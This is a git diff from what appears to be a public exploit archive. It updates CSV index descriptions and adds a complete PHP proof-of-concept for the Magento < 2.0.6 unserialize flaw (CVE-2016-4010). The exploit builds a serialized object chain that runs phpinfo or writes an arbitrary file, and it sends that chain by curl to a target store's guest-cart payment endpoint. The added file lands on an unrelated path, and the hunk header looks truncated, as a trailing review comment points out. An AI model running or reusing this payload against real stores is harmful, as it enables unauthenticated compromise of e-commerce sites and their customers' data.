diff --git a/files.csv b/files.csv
index 0bf0d24c3..db035f2d5 100755
--- a/files.csv
+++ b/files.csv
@@ -5247,7 +5247,7 @@ id,file,description,date,author,platform,type,port
 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 - (RFIi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
-5622,platforms/linux/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
+5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0
 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (RFI/rfd/SQL/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0
@@ -5257,7 +5257,7 @@ id,file,description,date,author,platform,type,port
 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
-5632,platforms/linux/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
+5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@@ -5344,7 +5344,7 @@ id,file,description,date,author,platform,type,port
 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0
 5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0
 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0
-5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
+5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0
 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0
 5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
@@ -18544,9 +18544,9 @@ id,file,description,date,author,platform,type,port
 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,dos,0
 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0
 21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0
-21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0
-21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0
-21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0
+21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0
+21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0
+21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0
 21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0
 21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0
 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart Arbitrary File Deletion Vulnerability",2012-09-12,JIKO,php,webapps,0
@@ -33855,7 +33855,7 @@ id,file,description,date,author,platform,type,port
 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80
-37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
+37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
@@ -35851,7 +35851,7 @@ id,file,description,date,author,platform,type,port
 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080
 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080
 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0
-39645,platforms/multiple/remote/39645.php,"PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0
+39645,platforms/multiple/remote/39645.php,"PHP <= 5.5.33 / <= 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0
 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80
 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0
 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0
@@ -36023,3 +36023,4 @@ id,file,description,date,author,platform,type,port
 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability",2016-05-17,"Google Security Research",multiple,dos,0
 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0
 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
+39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80
diff --git a/platforms/php/remote/21264.php b/platforms/php/remote/21264.php
index c30c0fca2..41218bbaa 100755
--- a/platforms/php/remote/21264.php
+++ b/platforms/php/remote/21264.php 
@@ -1,10 +1,11 @@ + arbitrary write file +// Date: 18/05/206 +// Exploit Author: agix (discovered by NETANEL RUBIN) +// Vendor Homepage: https://magento.com +// Version: < 2.0.6 +// CVE : CVE-2016-4010 + +// to get a valid guestCartId +// * add an item in your cart +// * go to checkout +// * fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts//shipping-information +// (* in the response check the payment method it may vary from checkmo) +// +// If you didn\'t provide whereToWrite, it will execute phpinfo to leak path. + + +class Magento_Framework_Simplexml_Config_Cache_File extends DataObject +{ + function __construct($data){ + $this->_data = $data; + } +} + +class Credis_Client{ + const TYPE_STRING = 'string'; + const TYPE_LIST = 'list'; + const TYPE_SET = 'set'; + const TYPE_ZSET = 'zset'; + const TYPE_HASH = 'hash'; + const TYPE_NONE = 'none'; + const FREAD_BLOCK_SIZE = 8192; + + /** + * Socket connection to the Redis server or Redis library instance + * @var resource|Redis + */ + protected $redis; + protected $redisMulti; + + /** + * Host of the Redis server + * @var string + */ + protected $host; + + /** + * Port on which the Redis server is running + * @var integer + */ + protected $port; + + /** + * Timeout for connecting to Redis server + * @var float + */ + protected $timeout; + + /** + * Timeout for reading response from Redis server + * @var float + */ + protected $readTimeout; + + /** + * Unique identifier for persistent connections + * @var string + */ + protected $persistent; + + /** + * @var bool + */ + protected $closeOnDestruct = TRUE; + + /** + * @var bool + */ + protected $connected = TRUE; + + /** + * @var bool + */ + protected $standalone; + + /** + * @var int + */ + protected $maxConnectRetries = 0; + + /** + * @var int + */ + protected $connectFailures = 0; + + /** + * @var bool + */ + protected $usePipeline = FALSE; + + /** + * @var array + */ + protected $commandNames; + + /** + * @var string + */ + 
protected $commands; + + /** + * @var bool + */ + protected $isMulti = FALSE; + + /** + * @var bool + */ + protected $isWatching = FALSE; + + /** + * @var string + */ + protected $authPassword; + + /** + * @var int + */ + protected $selectedDb = 0; + + /** + * Aliases for backwards compatibility with phpredis + * @var array + */ + protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem'); + + /** + * @var array + */ + protected $renamedCommands; + + /** + * @var int + */ + protected $requests = 0; + + + public function __construct($resource) { + $this->redis = new Magento_Sales_Model_Order_Payment_Transaction($resource); + } +} + +class DataObject +{ + /** + * Object attributes + * + * @var array + */ + protected $_data = []; + + /** + * Setter/Getter underscore transformation cache + * + * @var array + */ + protected static $_underscoreCache = []; +} + +abstract class AbstractModel2 extends DataObject +{ + /** + * Prefix of model events names + * + * @var string + */ + protected $_eventPrefix = 'core_abstract'; + + /** + * Parameter name in event + * + * In observe method you can use $observer->getEvent()->getObject() in this case + * + * @var string + */ + protected $_eventObject = 'object'; + + /** + * Name of object id field + * + * @var string + */ + protected $_idFieldName = 'id'; + + /** + * Data changes flag (true after setData|unsetData call) + * @var $_hasDataChange bool + */ + protected $_hasDataChanges = false; + + /** + * Original data that was loaded + * + * @var array + */ + protected $_origData; + + /** + * Object delete flag + * + * @var bool + */ + protected $_isDeleted = false; + + /** + * Resource model instance + * + * @var \Magento\Framework\Model\ResourceModel\Db\AbstractDb + */ + protected $_resource; + + /** + * Resource collection + * + * @var \Magento\Framework\Model\ResourceModel\Db\Collection\AbstractCollection + */ + protected $_resourceCollection; + + /** + * Name of the resource model + * + * @var 
string + */ + protected $_resourceName; + + /** + * Name of the resource collection model + * + * @var string + */ + protected $_collectionName; + + /** + * Model cache tag for clear cache in after save and after delete + * + * When you use true - all cache will be clean + * + * @var string|array|bool + */ + protected $_cacheTag = false; + + /** + * Flag which can stop data saving after before save + * Can be used for next sequence: we check data in _beforeSave, if data are + * not valid - we can set this flag to false value and save process will be stopped + * + * @var bool + */ + protected $_dataSaveAllowed = true; + + /** + * Flag which allow detect object state: is it new object (without id) or existing one (with id) + * + * @var bool + */ + protected $_isObjectNew = null; + + /** + * Validator for checking the model state before saving it + * + * @var \Zend_Validate_Interface|bool|null + */ + protected $_validatorBeforeSave = null; + + /** + * Application Event Dispatcher + * + * @var \Magento\Framework\Event\ManagerInterface + */ + protected $_eventManager; + + /** + * Application Cache Manager + * + * @var \Magento\Framework\App\CacheInterface + */ + protected $_cacheManager; + + /** + * @var \Magento\Framework\Registry + */ + protected $_registry; + + /** + * @var \Psr\Log\LoggerInterface + */ + protected $_logger; + + /** + * @var \Magento\Framework\App\State + */ + protected $_appState; + + /** + * @var \Magento\Framework\Model\ActionValidator\RemoveAction + */ + protected $_actionValidator; + + /** + * Array to store object's original data + * + * @var array + */ + protected $storedData = []; +} + +abstract class AbstractExtensibleModel extends AbstractModel2 +{ + protected $extensionAttributesFactory; + + /** + * @var \Magento\Framework\Api\ExtensionAttributesInterface + */ + protected $extensionAttributes; + + /** + * @var AttributeValueFactory + */ + protected $customAttributeFactory; + + /** + * @var string[] + */ + protected $customAttributesCodes = 
null; + + /** + * @var bool + */ + protected $customAttributesChanged = false; + +} + +abstract class AbstractModel extends AbstractExtensibleModel +{ +} + +class Magento_Sales_Model_Order_Payment_Transaction extends AbstractModel +{ + /**#@+ + * Supported transaction types + * @var string + */ + const TYPE_PAYMENT = 'payment'; + + const TYPE_ORDER = 'order'; + + const TYPE_AUTH = 'authorization'; + + const TYPE_CAPTURE = 'capture'; + + const TYPE_VOID = 'void'; + + const TYPE_REFUND = 'refund'; + + /**#@-*/ + + /** + * Raw details key in additional info + */ + const RAW_DETAILS = 'raw_details_info'; + + /** + * Order instance + * + * @var \Magento\Sales\Model\Order\Payment + */ + protected $_order = null; + + /** + * Parent transaction instance + * @var \Magento\Sales\Model\Order\Payment\Transaction + */ + protected $_parentTransaction = null; + + /** + * Child transactions, assoc array of transaction_id => instance + * + * @var array + */ + protected $_children = null; + + /** + * Child transactions, assoc array of txn_id => instance + * Filled only in case when all child transactions have txn_id + * Used for quicker search of child transactions using isset() as opposite to foreaching $_children + * + * @var array + */ + protected $_identifiedChildren = null; + + /** + * Whether to perform automatic actions on transactions, such as auto-closing and putting as a parent + * + * @var bool + */ + protected $_transactionsAutoLinking = true; + + /** + * Whether to throw exceptions on different operations + * + * @var bool + */ + protected $_isFailsafe = true; + + /** + * Whether transaction has children + * + * @var bool + */ + protected $_hasChild = null; + + /** + * Event object prefix + * + * @var string + * @see \Magento\Framework\Model\AbstractModel::$_eventPrefix + */ + protected $_eventPrefix = 'sales_order_payment_transaction'; + + /** + * Event object prefix + * + * @var string + * @see \Magento\Framework\Model\AbstractModel::$_eventObject + */ + protected 
$_eventObject = 'order_payment_transaction';
+
+ /**
+ * Order website id
+ *
+ * @var int
+ */
+ protected $_orderWebsiteId = null;
+
+ /**
+ * @var \Magento\Sales\Model\OrderFactory
+ */
+ protected $_orderFactory;
+
+ /**
+ * @var \Magento\Framework\Stdlib\DateTime\DateTimeFactory
+ */
+ protected $_dateFactory;
+
+ /**
+ * @var TransactionFactory
+ */
+ protected $_transactionFactory;
+
+ /**
+ * @var \Magento\Sales\Api\OrderPaymentRepositoryInterface
+ */
+ protected $orderPaymentRepository;
+
+ /**
+ * @var \Magento\Sales\Api\OrderRepositoryInterface
+ */
+ protected $orderRepository;
+
+ /**
+ * @param \Magento\Framework\Model\Context $context
+ * @param \Magento\Framework\Registry $registry
+ * @param \Magento\Framework\Api\ExtensionAttributesFactory $extensionFactory
+ * @param AttributeValueFactory $customAttributeFactory
+ * @param \Magento\Sales\Model\OrderFactory $orderFactory
+ * @param \Magento\Framework\Stdlib\DateTime\DateTimeFactory $dateFactory
+ * @param TransactionFactory $transactionFactory
+ * @param \Magento\Framework\Model\ResourceModel\AbstractResource $resource
+ * @param \Magento\Framework\Data\Collection\AbstractDb $resourceCollection
+ * @param array $data
+ * @SuppressWarnings(PHPMD.ExcessiveParameterList)
+ */
+ public function __construct($resource) {
+ $this->_resource = $resource;
+ }
+}
+
+class Magento_Framework_DB_Transaction{
+ protected $_objects = [];
+
+ /**
+ * Transaction objects array with alias key
+ *
+ * @var array
+ */
+ protected $_objectsByAlias = [];
+
+ /**
+ * Callbacks array.
+ *
+ * @var array
+ */
+ protected $_beforeCommitCallbacks = ["phpinfo"];
+}
+
+if(count($argv) < 3){
+ echo 'Usage: '.$argv[0].' 
(whereToWrite)'.chr(0x0a);
+ echo 'To get a valid guestCartId'.chr(0x0a);
+ echo '* add an item in your cart'.chr(0x0a);
+ echo '* go to checkout'.chr(0x0a);
+ echo '* fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts//shipping-information'.chr(0x0a);
+ echo '(* in the response check the payment method it may vary from "checkmo")'.chr(0x0a).chr(0x0a);
+ echo 'If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.'.chr(0x0a);
+ exit();
+}
+
+if(count($argv) === 4){
+ $data = [];
+ $data['is_allowed_to_save'] = True;
+ $data['stat_file_name'] = $argv[3];
+ $data['components'] = '';
+ $resource = new Magento_Framework_Simplexml_Config_Cache_File($data);
+}
+else{
+ $resource = new Magento_Framework_DB_Transaction();
+}
+
+$redis = new Credis_Client($resource);
+$serialized = serialize($redis);
+
+$payload = json_decode('{"paymentMethod":{"method":"checkmo", "additional_data":{"additional_information":""}}, "email": "valid@magento.com"}');
+
+$payload->paymentMethod->additional_data->additional_information = str_replace('Magento_Framework_DB_Transaction', 'Magento\\Framework\\DB\\Transaction', str_replace('Magento_Sales_Model_Order_Payment_Transaction', 'Magento\\Sales\\Model\\Order\\Payment\\Transaction', str_replace('Magento_Framework_Simplexml_Config_Cache_File', 'Magento\\Framework\\Simplexml\\Config\\Cache\\File', $serialized)));
+
+for($i=0; $i<2; $i++){
+ $c = curl_init($argv[1].'/rest/V1/guest-carts/'.$argv[2].'/set-payment-information');
+ curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
+ curl_setopt($c, CURLOPT_POSTFIELDS, json_encode($payload));
+ curl_exec($c);
+ curl_close($c);
+}
+
+?>
\ No newline at end of file
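Review bot: The `diff --git` header for this hunk targets `platforms/php/remote/21264.php`, but the new content is the Magento < 2.0.6 (CVE-2016-4010) PoC that the last files.csv hunk registers as `platforms/php/webapps/39838.php`, so the commit overwrites the 2002 PHP Safe_Mode entry 21264 (whose description it edits in the same commit) instead of adding a new file, and the index row it adds points at a path that does not exist. The new file should be created at `platforms/php/webapps/39838.php` and `21264.php` restored from the parent revision. In the header block, `// Date: 18/05/206` is missing a digit; `// Date: 18/05/2016` matches the CSV row date 2016-05-18. The first added line appears truncated in this view (`+ arbitrary write file`), so the `// Exploit Title:` header line is worth checking in the committed file.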